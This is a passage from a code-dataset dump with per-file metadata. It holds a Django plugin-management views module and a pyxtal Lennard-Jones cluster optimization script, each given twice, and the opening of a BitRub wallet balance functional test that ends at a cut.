class PluginIndexView(LoginRequiredMixin, ListView):
model = Plugin
template_name = 'core/index.html'
context_object_name = 'plugins'
paginate_by = 5
def get_context_data(self, **kwargs):
context = super(PluginIndexView, self).get_context_data(**kwargs)
plugins = self.get_queryset()
page = self.request.GET.get('page')
paginator = Paginator(plugins, self.paginate_by)
try:
plugins = paginator.page(page)
except PageNotAnInteger:
plugins = paginator.page(1)
except EmptyPage:
plugins = paginator.page(paginator.num_pages)
context['plugins'] = plugins
return context
class PluginDetailView(LoginRequiredMixin, DetailView):
model = Plugin
template_name = 'core/plugin_detail.html'
context_object_name = 'plugin'
paginate_by = 5
def get_context_data(self, **kwargs):
context = super(PluginDetailView, self).get_context_data(**kwargs)
plugin_runs = PluginRun.objects.filter(plugin=self.kwargs['pk'])
page = self.request.GET.get('page')
paginator = Paginator(plugin_runs, self.paginate_by)
try:
plugin_runs = paginator.page(page)
except PageNotAnInteger:
plugin_runs = paginator.page(1)
except EmptyPage:
plugin_runs = paginator.page(paginator.num_pages)
context['plugin_runs'] = plugin_runs
return context
class PluginCreateView(LoginRequiredMixin, CreateView):
form_class = PluginSourceForm
template_name = 'core/plugin_create_form.html'
success_url = reverse_lazy('core:index')
def get_context_data(self, **kwargs):
context = super(PluginCreateView, self).get_context_data(**kwargs)
context['plugin_formset'] = PluginFormSet()
return context
def post(self, request, *args, **kwargs):
self.object = None
form_class = self.get_form_class()
form = self.get_form(form_class)
plugin_formset = PluginFormSet(self.request.POST)
if form.is_valid() and plugin_formset.is_valid():
return self.form_valid(form, plugin_formset, request.user)
else:
return self.form_invalid(form, plugin_formset)
def form_valid(self, form: BaseModelForm, plugin_formset: PluginFormSet, user):
# save PluginSource
self.object = form.save(commit=False)
self.object.source_dest = form.cleaned_data['source_dest']
self.object.source_hash = form.cleaned_data['source_hash']
self.object.upload_time = form.cleaned_data['upload_time']
self.object.upload_user = user
self.object.save()
build_hash_thread = threading.Thread(
target=build_zip_json, args=(form.cleaned_data['plugin_zip_file'].file, self.object))
build_hash_thread.start()
log_json: dict = {
'log_datetime': datetime.timestamp(timezone.now()),
'source_dest': self.object.source_dest,
'source_hash': self.object.source_hash,
'upload_time': self.object.upload_time.strftime("%m/%d/%Y, %H:%M:%S"),
'upload_user_username': self.object.upload_user.username,
'upload_user_email': self.object.upload_user.email,
}
write_log(LogType.CREATE, self.object, log_json)
# save Plugin
plugin: List[Plugin] = plugin_formset.save(commit=False)
plugin[0].plugin_source = self.object
plugin[0].python_version = plugin_formset.cleaned_data[0]['python_version']
plugin[0].plugin_dest = 'core' + os.sep + \
'plugin' + os.sep + self.object.source_hash + '_' + \
str(datetime.timestamp(self.object.upload_time))
extract_zip_thread = threading.Thread(target=extract_zip, args=(
form.cleaned_data['plugin_zip_file'], plugin[0].plugin_dest))
extract_zip_thread.start()
plugin[0].save()
extract_zip_thread.join()
venv_thread = threading.Thread(target=create_venv, args=(plugin[0], ))
venv_thread.start()
return redirect(reverse("core:index"))
def form_invalid(self, form, plugin_formset):
return self.render_to_response(
self.get_context_data(form=form,
product_meta_formset=plugin_formset
)
)
class PluginDeleteView(LoginRequiredMixin, DeleteView):
model = Plugin
template_name = 'core/plugin_delete.html'
success_url = reverse_lazy('core:index')
def delete(self, request: HttpRequest, *args: str, **kwargs: Any) -> HttpResponse:
object: Plugin = self.get_object()
user = request.user
source_dest = object.plugin_source.source_dest
shutil.rmtree(object.plugin_dest)
deleted_time = timezone.now()
deleted_dest = 'core' + os.sep + 'source' + os.sep + 'deleted_' + object.plugin_source.source_hash + \
'_' + str(datetime.timestamp(object.plugin_source.upload_time))
log_json: dict = {
'log_datetime': datetime.timestamp(deleted_time),
'source_dest': object.plugin_source.source_dest,
'source_hash': object.plugin_source.source_hash,
'upload_time': object.plugin_source.upload_time.strftime("%m/%d/%Y, %H:%M:%S"),
'upload_user_username': object.plugin_source.upload_user.username,
'upload_user_email': object.plugin_source.upload_user.email,
'source_file_hash': json.loads(object.plugin_source.source_file_hash),
'username': user.username,
'user_email': user.email,
'deleted_dest': deleted_dest
}
write_log(LogType.DELETE, object.plugin_source, log_json)
shutil.move(source_dest, deleted_dest)
object.plugin_source.source_hash = 'deleted_' + object.plugin_source.source_hash
object.plugin_source.source_dest = deleted_dest
object.plugin_source.save()
return super().delete(request, *args, **kwargs)
| 38.464286
| 110
| 0.67635
|
import logging
import os
import json
import shutil
import threading
from typing import Any, List
from django.contrib.auth import login
from django.forms.models import BaseModelForm
from django.http.request import HttpRequest
from django.http.response import HttpResponse
from django.views.generic import ListView, DetailView, CreateView
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from django.urls import reverse_lazy
from django.views.generic.edit import DeleteView
from django.shortcuts import redirect, render
from django.urls import reverse
from django.utils import timezone
from datetime import datetime
from django.contrib.auth.mixins import LoginRequiredMixin
from core.utils import build_zip_json, create_venv, extract_zip, get_python_choices, write_log
from core.models import Plugin, PluginRun
from core.forms import NewUserForm, PluginFormSet, PluginSourceForm
from core.enums.log_type_enum import LogType
logging.basicConfig(level=logging.DEBUG,
format='[%(levelname)s] (%(threadName)-9s) %(message)s',)
def register_request(request: HttpRequest):
if request.method == "POST":
form = NewUserForm(request.POST)
if form.is_valid():
user = form.save()
login(request, user)
return redirect(reverse("core:index"))
form = NewUserForm()
return render(request=request, template_name="registration/register.html", context={"register_form":form})
class PluginIndexView(LoginRequiredMixin, ListView):
model = Plugin
template_name = 'core/index.html'
context_object_name = 'plugins'
paginate_by = 5
def get_context_data(self, **kwargs):
context = super(PluginIndexView, self).get_context_data(**kwargs)
plugins = self.get_queryset()
page = self.request.GET.get('page')
paginator = Paginator(plugins, self.paginate_by)
try:
plugins = paginator.page(page)
except PageNotAnInteger:
plugins = paginator.page(1)
except EmptyPage:
plugins = paginator.page(paginator.num_pages)
context['plugins'] = plugins
return context
class PluginDetailView(LoginRequiredMixin, DetailView):
model = Plugin
template_name = 'core/plugin_detail.html'
context_object_name = 'plugin'
paginate_by = 5
def get_context_data(self, **kwargs):
context = super(PluginDetailView, self).get_context_data(**kwargs)
plugin_runs = PluginRun.objects.filter(plugin=self.kwargs['pk'])
page = self.request.GET.get('page')
paginator = Paginator(plugin_runs, self.paginate_by)
try:
plugin_runs = paginator.page(page)
except PageNotAnInteger:
plugin_runs = paginator.page(1)
except EmptyPage:
plugin_runs = paginator.page(paginator.num_pages)
context['plugin_runs'] = plugin_runs
return context
class PluginCreateView(LoginRequiredMixin, CreateView):
form_class = PluginSourceForm
template_name = 'core/plugin_create_form.html'
success_url = reverse_lazy('core:index')
def get_context_data(self, **kwargs):
context = super(PluginCreateView, self).get_context_data(**kwargs)
context['plugin_formset'] = PluginFormSet()
return context
def post(self, request, *args, **kwargs):
self.object = None
form_class = self.get_form_class()
form = self.get_form(form_class)
plugin_formset = PluginFormSet(self.request.POST)
if form.is_valid() and plugin_formset.is_valid():
return self.form_valid(form, plugin_formset, request.user)
else:
return self.form_invalid(form, plugin_formset)
def form_valid(self, form: BaseModelForm, plugin_formset: PluginFormSet, user):
self.object = form.save(commit=False)
self.object.source_dest = form.cleaned_data['source_dest']
self.object.source_hash = form.cleaned_data['source_hash']
self.object.upload_time = form.cleaned_data['upload_time']
self.object.upload_user = user
self.object.save()
build_hash_thread = threading.Thread(
target=build_zip_json, args=(form.cleaned_data['plugin_zip_file'].file, self.object))
build_hash_thread.start()
log_json: dict = {
'log_datetime': datetime.timestamp(timezone.now()),
'source_dest': self.object.source_dest,
'source_hash': self.object.source_hash,
'upload_time': self.object.upload_time.strftime("%m/%d/%Y, %H:%M:%S"),
'upload_user_username': self.object.upload_user.username,
'upload_user_email': self.object.upload_user.email,
}
write_log(LogType.CREATE, self.object, log_json)
plugin: List[Plugin] = plugin_formset.save(commit=False)
plugin[0].plugin_source = self.object
plugin[0].python_version = plugin_formset.cleaned_data[0]['python_version']
plugin[0].plugin_dest = 'core' + os.sep + \
'plugin' + os.sep + self.object.source_hash + '_' + \
str(datetime.timestamp(self.object.upload_time))
extract_zip_thread = threading.Thread(target=extract_zip, args=(
form.cleaned_data['plugin_zip_file'], plugin[0].plugin_dest))
extract_zip_thread.start()
plugin[0].save()
extract_zip_thread.join()
venv_thread = threading.Thread(target=create_venv, args=(plugin[0], ))
venv_thread.start()
return redirect(reverse("core:index"))
def form_invalid(self, form, plugin_formset):
return self.render_to_response(
self.get_context_data(form=form,
product_meta_formset=plugin_formset
)
)
class PluginDeleteView(LoginRequiredMixin, DeleteView):
model = Plugin
template_name = 'core/plugin_delete.html'
success_url = reverse_lazy('core:index')
def delete(self, request: HttpRequest, *args: str, **kwargs: Any) -> HttpResponse:
object: Plugin = self.get_object()
user = request.user
source_dest = object.plugin_source.source_dest
shutil.rmtree(object.plugin_dest)
deleted_time = timezone.now()
deleted_dest = 'core' + os.sep + 'source' + os.sep + 'deleted_' + object.plugin_source.source_hash + \
'_' + str(datetime.timestamp(object.plugin_source.upload_time))
log_json: dict = {
'log_datetime': datetime.timestamp(deleted_time),
'source_dest': object.plugin_source.source_dest,
'source_hash': object.plugin_source.source_hash,
'upload_time': object.plugin_source.upload_time.strftime("%m/%d/%Y, %H:%M:%S"),
'upload_user_username': object.plugin_source.upload_user.username,
'upload_user_email': object.plugin_source.upload_user.email,
'source_file_hash': json.loads(object.plugin_source.source_file_hash),
'username': user.username,
'user_email': user.email,
'deleted_dest': deleted_dest
}
write_log(LogType.DELETE, object.plugin_source, log_json)
shutil.move(source_dest, deleted_dest)
object.plugin_source.source_hash = 'deleted_' + object.plugin_source.source_hash
object.plugin_source.source_dest = deleted_dest
object.plugin_source.save()
return super().delete(request, *args, **kwargs)
| true
| true
|
f71916d9d2b9a6b8eedcdd508d02ad5f7bc188ca
| 9,543
|
py
|
Python
|
examples/LJ_38_Oh.py
|
scottfredericks/PyXtal_Old
|
3fa39b2f188197b42576087c6f4c3bca14b2e8f3
|
[
"MIT"
] | 1
|
2019-10-25T01:10:47.000Z
|
2019-10-25T01:10:47.000Z
|
examples/LJ_38_Oh.py
|
scottfredericks/PyXtal_Old
|
3fa39b2f188197b42576087c6f4c3bca14b2e8f3
|
[
"MIT"
] | null | null | null |
examples/LJ_38_Oh.py
|
scottfredericks/PyXtal_Old
|
3fa39b2f188197b42576087c6f4c3bca14b2e8f3
|
[
"MIT"
] | null | null | null |
from pyxtal.crystal import random_cluster
from copy import deepcopy
from optparse import OptionParser
from random import randint, choice
from scipy.optimize import minimize
from scipy.spatial.distance import pdist, cdist
from pyxtal.molecule import PointGroupAnalyzer
from pymatgen import Molecule
from pyxtal.database.collection import Collection
from time import time
import numpy as np
import matplotlib.pyplot as plt
import warnings
plt.style.use("bmh")
warnings.filterwarnings("ignore")
"""
This is a script to
1, generate random clusters
2, perform optimization
"""
def LJ(pos, dim, mu=0.1):
"""
Calculate the total energy
Args:
pos: 1D array with N*dim numbers representing the atomic positions
dim: dimension of the hyper/normal space
output
E: the total energy with punishing function
"""
N_atom = int(len(pos)/dim)
pos = np.reshape(pos, (N_atom, dim))
distance = pdist(pos)
r6 = np.power(distance, 6)
r12 = np.multiply(r6, r6)
Eng = np.sum(4*(1/r12 - 1/r6))
if dim > 3:
norm = 0
for i in range(3,dim):
#diff = pos[:, i] - np.mean(pos[:, i])
diff = pos[:, i]
norm += np.sum(np.multiply(diff, diff))
Eng += 0.5*mu*norm
return Eng
def LJ_force(pos, dim, mu=0.1):
N_atom = int(len(pos)/dim)
pos = np.reshape(pos,[N_atom, dim])
force = np.zeros([N_atom, dim])
for i, pos0 in enumerate(pos):
pos1 = deepcopy(pos)
pos1 = np.delete(pos1, i, 0)
distance = cdist([pos0], pos1)
r = pos1 - pos0
r2 = np.power(distance, 2)
r6 = np.power(r2, 3)
r12 = np.power(r6, 2)
force[i] = np.dot((48/r12-24/r6)/r2, r)
# force from the punish function mu*sum([x-mean(x)]^2)
if dim > 3:
for j in range(3,dim):
#force[i, j] += mu*(pos[i, j] - np.mean(pos[:, j]))
force[i, j] += mu*pos[i, j] #- np.mean(pos[:, j]))
return force.flatten()
def single_optimize(pos, dim=3, kt=0.5, mu=0.1):
"""
perform optimization for a given cluster
Args:
pos: N*dim0 array representing the atomic positions
dim: dimension of the hyper/normal space
kt: perturbation factors
output:
energy: optmized energy
pos: optimized positions
"""
N_atom = len(pos)
diff = dim - np.shape(pos)[1]
# if the input pos has less dimensions, we insert a random array for the extra dimension
# if the input pos has more dimensions, we delete the array for the extra dimension
if diff > 0:
pos = np.hstack((pos, 0.5*(np.random.random([N_atom, diff])-0.5) ))
elif diff < 0:
pos = pos[:, :dim]
pos = pos.flatten()
res = minimize(LJ, pos, args=(dim, mu), jac=LJ_force, method='CG', tol=1e-3)
pos = np.reshape(res.x, (N_atom, dim))
energy = res.fun
return energy, pos
def parse_symmetry(pos):
mol = Molecule(['C']*len(pos), pos)
try:
symbol = PointGroupAnalyzer(mol, tolerance=0.1).sch_symbol
except:
symbol = 'N/A'
return symbol
class LJ_prediction():
"""
A class to perform global optimization on LJ clusters
Args:
Attributes:
"""
def __init__(self, numIons):
self.numIons = numIons
ref = Collection('clusters')[str(numIons)]
print('\nReference for LJ {0:3d} is {1:12.3f} eV, PG: {2:4s}'.\
format(numIons, ref['energy'], ref['pointgroup']))
self.reference = ref
self.time0 = time()
def generate_cluster(self, pgs = range(2, 33)):
run = True
while run:
pg = choice(pgs)
cluster = random_cluster(pg, ['Mo'], [self.numIons], 1.0)
if cluster.valid:
run = False
return cluster.cart_coords
def predict(self, dim=3, maxN=100, ncpu=2, pgs=range(2, 33)):
print('\nPerforming random search at {0:d}D space\n'.format(dim))
cycle = range(maxN)
if ncpu > 1:
from multiprocessing import Pool
from functools import partial
with Pool(ncpu) as p:
func = partial(self.relaxation, dim, pgs)
res = p.map(func, cycle)
p.close()
p.join()
else:
res=[]
for i in cycle:
res.append(self.relaxation(dim, pgs, i))
N_success = 0
for dct in res:
if dct['ground']:
N_success +=1
print('\nHit the ground state {0:4d} times out of {1:4d} attempts\n'.\
format(N_success, maxN))
return res
def relaxation(self, dim, pgs, ind):
pos = self.generate_cluster(pgs)
pg1 = parse_symmetry(pos)
if dim == 3:
[energy, pos] = single_optimize(pos, 3)
else:
do = True
while do:
[energy1, pos1] = single_optimize(pos, 3)
[energy2, pos2] = single_optimize(pos1, dim)
[energy3, pos3] = single_optimize(pos2, 3)
#print(energy1, energy2, energy3)
if abs(energy3-energy1) < 1e-3 or energy3 > energy1:
pos = pos1
energy = energy1
do = False
#print('stop')
else:
pos = pos3
if abs(energy-self.reference['energy']) <1e-3:
ground = True
elif energy < self.reference['energy']:
ground = True
print(" --- ENERGY LOWER THAN REFERENCE FOUND ---")
else:
ground = False
pg2 = parse_symmetry(pos)
res = {'pos': pos,
'energy': energy,
'pg_init': pg1,
'pg_finial': pg2,
'ground': ground,
'id': ind,
}
if ground:
print('ID: {0:4d} PG initial: {1:4s} relaxed: {2:4s} Energy: {3:12.3f} Time: {4:6.1f} ++++++'.\
format(ind, pg1, pg2, energy, (time()-self.time0)/60))
elif ind%10 == 0:
print('ID: {0:4d} PG initial: {1:4s} relaxed: {2:4s} Energy: {3:12.3f} Time: {4:6.1f} '.\
format(ind, pg1, pg2, energy, (time()-self.time0)/60))
return res
if __name__ == "__main__":
#-------------------------------- Options -------------------------
parser = OptionParser()
parser.add_option("-d", "--dimension", dest="dim", metavar='dim', default=3, type=int,
help="dimension, 3 or higher")
parser.add_option("-n", "--numIons", dest="numIons", default=16, type=int,
help="desired numbers of atoms: 16")
parser.add_option("-m", "--max", dest="max", default=100, type=int,
help="maximum number of attempts")
parser.add_option("-p", "--proc", dest="proc", default=1, type=int,
help="number of processors, default 1")
(options, args) = parser.parse_args()
N = options.numIons #38
maxN = options.max #1000
dim = options.dim #4
ncpu = options.proc
lj_run = LJ_prediction(N)
eng_min = lj_run.reference['energy']
t0 = time()
print("---No symmetry---")
results1 = lj_run.predict(dim=dim, maxN=maxN, ncpu=ncpu, pgs=[1])
print('time: {0:6.2f} seconds'.format(time()-t0))
print("---Random symmetry---")
results2 = lj_run.predict(dim=dim, maxN=maxN, ncpu=ncpu, pgs=range(2, 33))
print('time: {0:6.2f} seconds'.format(time()-t0))
print("---Oh only---")
results3 = lj_run.predict(dim=dim, maxN=maxN, ncpu=ncpu, pgs=[32])
print('time: {0:6.2f} seconds'.format(time()-t0))
print("---Random symmetry (not Oh)---")
results4 = lj_run.predict(dim=dim, maxN=maxN, ncpu=ncpu, pgs=range(2, 32))
print('time: {0:6.2f} seconds'.format(time()-t0))
eng1 = []
eng2 = []
eng3 = []
eng4 = []
ground1 = 0
ground2 = 0
ground3 = 0
ground4 = 0
for dct in results1:
if dct['ground']:
ground1 += 1
eng1.append(dct['energy'])
for dct in results2:
if dct['ground']:
ground2 += 1
eng2.append(dct['energy'])
for dct in results3:
if dct['ground']:
ground3 += 1
eng3.append(dct['energy'])
for dct in results4:
if dct['ground']:
ground4 += 1
eng4.append(dct['energy'])
eng1 = np.array(eng1)
eng2 = np.array(eng2)
eng3 = np.array(eng3)
eng4 = np.array(eng4)
eng_max = max([max(eng1), max(eng2)])
bins = np.linspace(eng_min-0.1, 0.1, 100)
plt.hist(eng1, bins, alpha=0.5, label='no symmetry: ' + str(ground1) + '/' + str(len(eng1)))
plt.hist(eng2, bins, alpha=0.5, label='random point groups: ' + str(ground2) + '/' + str(len(eng2)))
plt.xlabel('Energy (eV)')
plt.ylabel('Counts')
plt.legend(loc=1)
plt.title('LJ cluster: ' + str(N) + ' Ground state: ' + str(eng_min))
plt.savefig(str(N)+'-'+str(maxN)+'-'+str(dim)+'.pdf')
plt.close()
eng_max = max([max(eng3), max(eng4)])
bins = np.linspace(eng_min-0.1, 0.1, 100)
plt.hist(eng3, bins, alpha=0.5, label='Oh only: ' + str(ground3) + '/' + str(len(eng3)))
plt.hist(eng4, bins, alpha=0.5, label='random point groups (excluding Oh): ' + str(ground4) + '/' + str(len(eng4)))
plt.xlabel('Energy (eV)')
plt.ylabel('Counts')
plt.legend(loc=1)
plt.title('LJ cluster: ' + str(N) + ' Ground state: ' + str(eng_min))
plt.savefig(str(N)+'-'+str(maxN)+'-'+str(dim)+'_single.pdf')
plt.close()
| 33.250871
| 119
| 0.551085
|
from pyxtal.crystal import random_cluster
from copy import deepcopy
from optparse import OptionParser
from random import randint, choice
from scipy.optimize import minimize
from scipy.spatial.distance import pdist, cdist
from pyxtal.molecule import PointGroupAnalyzer
from pymatgen import Molecule
from pyxtal.database.collection import Collection
from time import time
import numpy as np
import matplotlib.pyplot as plt
import warnings
plt.style.use("bmh")
warnings.filterwarnings("ignore")
def LJ(pos, dim, mu=0.1):
N_atom = int(len(pos)/dim)
pos = np.reshape(pos, (N_atom, dim))
distance = pdist(pos)
r6 = np.power(distance, 6)
r12 = np.multiply(r6, r6)
Eng = np.sum(4*(1/r12 - 1/r6))
if dim > 3:
norm = 0
for i in range(3,dim):
diff = pos[:, i]
norm += np.sum(np.multiply(diff, diff))
Eng += 0.5*mu*norm
return Eng
def LJ_force(pos, dim, mu=0.1):
N_atom = int(len(pos)/dim)
pos = np.reshape(pos,[N_atom, dim])
force = np.zeros([N_atom, dim])
for i, pos0 in enumerate(pos):
pos1 = deepcopy(pos)
pos1 = np.delete(pos1, i, 0)
distance = cdist([pos0], pos1)
r = pos1 - pos0
r2 = np.power(distance, 2)
r6 = np.power(r2, 3)
r12 = np.power(r6, 2)
force[i] = np.dot((48/r12-24/r6)/r2, r)
if dim > 3:
for j in range(3,dim):
force[i, j] += mu*pos[i, j]
return force.flatten()
def single_optimize(pos, dim=3, kt=0.5, mu=0.1):
N_atom = len(pos)
diff = dim - np.shape(pos)[1]
if diff > 0:
pos = np.hstack((pos, 0.5*(np.random.random([N_atom, diff])-0.5) ))
elif diff < 0:
pos = pos[:, :dim]
pos = pos.flatten()
res = minimize(LJ, pos, args=(dim, mu), jac=LJ_force, method='CG', tol=1e-3)
pos = np.reshape(res.x, (N_atom, dim))
energy = res.fun
return energy, pos
def parse_symmetry(pos):
mol = Molecule(['C']*len(pos), pos)
try:
symbol = PointGroupAnalyzer(mol, tolerance=0.1).sch_symbol
except:
symbol = 'N/A'
return symbol
class LJ_prediction():
def __init__(self, numIons):
self.numIons = numIons
ref = Collection('clusters')[str(numIons)]
print('\nReference for LJ {0:3d} is {1:12.3f} eV, PG: {2:4s}'.\
format(numIons, ref['energy'], ref['pointgroup']))
self.reference = ref
self.time0 = time()
def generate_cluster(self, pgs = range(2, 33)):
run = True
while run:
pg = choice(pgs)
cluster = random_cluster(pg, ['Mo'], [self.numIons], 1.0)
if cluster.valid:
run = False
return cluster.cart_coords
def predict(self, dim=3, maxN=100, ncpu=2, pgs=range(2, 33)):
print('\nPerforming random search at {0:d}D space\n'.format(dim))
cycle = range(maxN)
if ncpu > 1:
from multiprocessing import Pool
from functools import partial
with Pool(ncpu) as p:
func = partial(self.relaxation, dim, pgs)
res = p.map(func, cycle)
p.close()
p.join()
else:
res=[]
for i in cycle:
res.append(self.relaxation(dim, pgs, i))
N_success = 0
for dct in res:
if dct['ground']:
N_success +=1
print('\nHit the ground state {0:4d} times out of {1:4d} attempts\n'.\
format(N_success, maxN))
return res
def relaxation(self, dim, pgs, ind):
pos = self.generate_cluster(pgs)
pg1 = parse_symmetry(pos)
if dim == 3:
[energy, pos] = single_optimize(pos, 3)
else:
do = True
while do:
[energy1, pos1] = single_optimize(pos, 3)
[energy2, pos2] = single_optimize(pos1, dim)
[energy3, pos3] = single_optimize(pos2, 3)
if abs(energy3-energy1) < 1e-3 or energy3 > energy1:
pos = pos1
energy = energy1
do = False
else:
pos = pos3
if abs(energy-self.reference['energy']) <1e-3:
ground = True
elif energy < self.reference['energy']:
ground = True
print(" --- ENERGY LOWER THAN REFERENCE FOUND ---")
else:
ground = False
pg2 = parse_symmetry(pos)
res = {'pos': pos,
'energy': energy,
'pg_init': pg1,
'pg_finial': pg2,
'ground': ground,
'id': ind,
}
if ground:
print('ID: {0:4d} PG initial: {1:4s} relaxed: {2:4s} Energy: {3:12.3f} Time: {4:6.1f} ++++++'.\
format(ind, pg1, pg2, energy, (time()-self.time0)/60))
elif ind%10 == 0:
print('ID: {0:4d} PG initial: {1:4s} relaxed: {2:4s} Energy: {3:12.3f} Time: {4:6.1f} '.\
format(ind, pg1, pg2, energy, (time()-self.time0)/60))
return res
if __name__ == "__main__":
parser = OptionParser()
parser.add_option("-d", "--dimension", dest="dim", metavar='dim', default=3, type=int,
help="dimension, 3 or higher")
parser.add_option("-n", "--numIons", dest="numIons", default=16, type=int,
help="desired numbers of atoms: 16")
parser.add_option("-m", "--max", dest="max", default=100, type=int,
help="maximum number of attempts")
parser.add_option("-p", "--proc", dest="proc", default=1, type=int,
help="number of processors, default 1")
(options, args) = parser.parse_args()
N = options.numIons
maxN = options.max
dim = options.dim
ncpu = options.proc
lj_run = LJ_prediction(N)
eng_min = lj_run.reference['energy']
t0 = time()
print("---No symmetry---")
results1 = lj_run.predict(dim=dim, maxN=maxN, ncpu=ncpu, pgs=[1])
print('time: {0:6.2f} seconds'.format(time()-t0))
print("---Random symmetry---")
results2 = lj_run.predict(dim=dim, maxN=maxN, ncpu=ncpu, pgs=range(2, 33))
print('time: {0:6.2f} seconds'.format(time()-t0))
print("---Oh only---")
results3 = lj_run.predict(dim=dim, maxN=maxN, ncpu=ncpu, pgs=[32])
print('time: {0:6.2f} seconds'.format(time()-t0))
print("---Random symmetry (not Oh)---")
results4 = lj_run.predict(dim=dim, maxN=maxN, ncpu=ncpu, pgs=range(2, 32))
print('time: {0:6.2f} seconds'.format(time()-t0))
eng1 = []
eng2 = []
eng3 = []
eng4 = []
ground1 = 0
ground2 = 0
ground3 = 0
ground4 = 0
for dct in results1:
if dct['ground']:
ground1 += 1
eng1.append(dct['energy'])
for dct in results2:
if dct['ground']:
ground2 += 1
eng2.append(dct['energy'])
for dct in results3:
if dct['ground']:
ground3 += 1
eng3.append(dct['energy'])
for dct in results4:
if dct['ground']:
ground4 += 1
eng4.append(dct['energy'])
eng1 = np.array(eng1)
eng2 = np.array(eng2)
eng3 = np.array(eng3)
eng4 = np.array(eng4)
eng_max = max([max(eng1), max(eng2)])
bins = np.linspace(eng_min-0.1, 0.1, 100)
plt.hist(eng1, bins, alpha=0.5, label='no symmetry: ' + str(ground1) + '/' + str(len(eng1)))
plt.hist(eng2, bins, alpha=0.5, label='random point groups: ' + str(ground2) + '/' + str(len(eng2)))
plt.xlabel('Energy (eV)')
plt.ylabel('Counts')
plt.legend(loc=1)
plt.title('LJ cluster: ' + str(N) + ' Ground state: ' + str(eng_min))
plt.savefig(str(N)+'-'+str(maxN)+'-'+str(dim)+'.pdf')
plt.close()
eng_max = max([max(eng3), max(eng4)])
bins = np.linspace(eng_min-0.1, 0.1, 100)
plt.hist(eng3, bins, alpha=0.5, label='Oh only: ' + str(ground3) + '/' + str(len(eng3)))
plt.hist(eng4, bins, alpha=0.5, label='random point groups (excluding Oh): ' + str(ground4) + '/' + str(len(eng4)))
plt.xlabel('Energy (eV)')
plt.ylabel('Counts')
plt.legend(loc=1)
plt.title('LJ cluster: ' + str(N) + ' Ground state: ' + str(eng_min))
plt.savefig(str(N)+'-'+str(maxN)+'-'+str(dim)+'_single.pdf')
plt.close()
| true
| true
|
f7191733ac9155fe9da162a2124c9882e8a0a396
| 12,464
|
py
|
Python
|
test/functional/wallet_balance.py
|
bitcorub/bitrub
|
28711e4e8ebdee144a1437ece07afcf792a7cf60
|
[
"MIT"
] | 1
|
2019-12-09T18:33:47.000Z
|
2019-12-09T18:33:47.000Z
|
test/functional/wallet_balance.py
|
bitcorub/bitrub
|
28711e4e8ebdee144a1437ece07afcf792a7cf60
|
[
"MIT"
] | null | null | null |
test/functional/wallet_balance.py
|
bitcorub/bitrub
|
28711e4e8ebdee144a1437ece07afcf792a7cf60
|
[
"MIT"
] | 1
|
2019-12-12T20:05:36.000Z
|
2019-12-12T20:05:36.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2018-2019 The BitRub Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the wallet balance RPC methods."""
from decimal import Decimal
import struct
from test_framework.address import ADDRESS_BCRT1_UNSPENDABLE as ADDRESS_WATCHONLY
from test_framework.test_framework import BitRubTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
connect_nodes,
sync_blocks,
)
def create_transactions(node, address, amt, fees):
# Create and sign raw transactions from node to address for amt.
# Creates a transaction for each fee and returns an array
# of the raw transactions.
utxos = [u for u in node.listunspent(0) if u['spendable']]
# Create transactions
inputs = []
ins_total = 0
for utxo in utxos:
inputs.append({"txid": utxo["txid"], "vout": utxo["vout"]})
ins_total += utxo['amount']
if ins_total >= amt + max(fees):
break
# make sure there was enough utxos
assert ins_total >= amt + max(fees)
txs = []
for fee in fees:
outputs = {address: amt}
# prevent 0 change output
if ins_total > amt + fee:
outputs[node.getrawchangeaddress()] = ins_total - amt - fee
raw_tx = node.createrawtransaction(inputs, outputs, 0, True)
raw_tx = node.signrawtransactionwithwallet(raw_tx)
assert_equal(raw_tx['complete'], True)
txs.append(raw_tx)
return txs
class WalletTest(BitRubTestFramework):
def set_test_params(self):
self.num_nodes = 2
self.setup_clean_chain = True
self.extra_args = [
['-limitdescendantcount=3'], # Limit mempool descendants as a hack to have wallet txs rejected from the mempool
[],
]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
self.nodes[0].importaddress(ADDRESS_WATCHONLY)
# Check that nodes don't own any UTXOs
assert_equal(len(self.nodes[0].listunspent()), 0)
assert_equal(len(self.nodes[1].listunspent()), 0)
self.log.info("Check that only node 0 is watching an address")
assert 'watchonly' in self.nodes[0].getbalances()
assert 'watchonly' not in self.nodes[1].getbalances()
self.log.info("Mining blocks ...")
self.nodes[0].generate(1)
self.sync_all()
self.nodes[1].generate(1)
self.nodes[1].generatetoaddress(101, ADDRESS_WATCHONLY)
self.sync_all()
assert_equal(self.nodes[0].getbalances()['mine']['trusted'], 50)
assert_equal(self.nodes[0].getwalletinfo()['balance'], 50)
assert_equal(self.nodes[1].getbalances()['mine']['trusted'], 50)
assert_equal(self.nodes[0].getbalances()['watchonly']['immature'], 5000)
assert 'watchonly' not in self.nodes[1].getbalances()
assert_equal(self.nodes[0].getbalance(), 50)
assert_equal(self.nodes[1].getbalance(), 50)
self.log.info("Test getbalance with different arguments")
assert_equal(self.nodes[0].getbalance("*"), 50)
assert_equal(self.nodes[0].getbalance("*", 1), 50)
assert_equal(self.nodes[0].getbalance("*", 1, True), 100)
assert_equal(self.nodes[0].getbalance(minconf=1), 50)
assert_equal(self.nodes[0].getbalance(minconf=0, include_watchonly=True), 100)
assert_equal(self.nodes[1].getbalance(minconf=0, include_watchonly=True), 50)
# Send 40 BTR from 0 to 1 and 60 BTR from 1 to 0.
txs = create_transactions(self.nodes[0], self.nodes[1].getnewaddress(), 40, [Decimal('0.01')])
self.nodes[0].sendrawtransaction(txs[0]['hex'])
self.nodes[1].sendrawtransaction(txs[0]['hex']) # sending on both nodes is faster than waiting for propagation
self.sync_all()
txs = create_transactions(self.nodes[1], self.nodes[0].getnewaddress(), 60, [Decimal('0.01'), Decimal('0.02')])
self.nodes[1].sendrawtransaction(txs[0]['hex'])
self.nodes[0].sendrawtransaction(txs[0]['hex']) # sending on both nodes is faster than waiting for propagation
self.sync_all()
# First argument of getbalance must be set to "*"
assert_raises_rpc_error(-32, "dummy first argument must be excluded or set to \"*\"", self.nodes[1].getbalance, "")
self.log.info("Test getbalance and getunconfirmedbalance with unconfirmed inputs")
# Before `test_balance()`, we have had two nodes with a balance of 50
# each and then we:
#
# 1) Sent 40 from node A to node B with fee 0.01
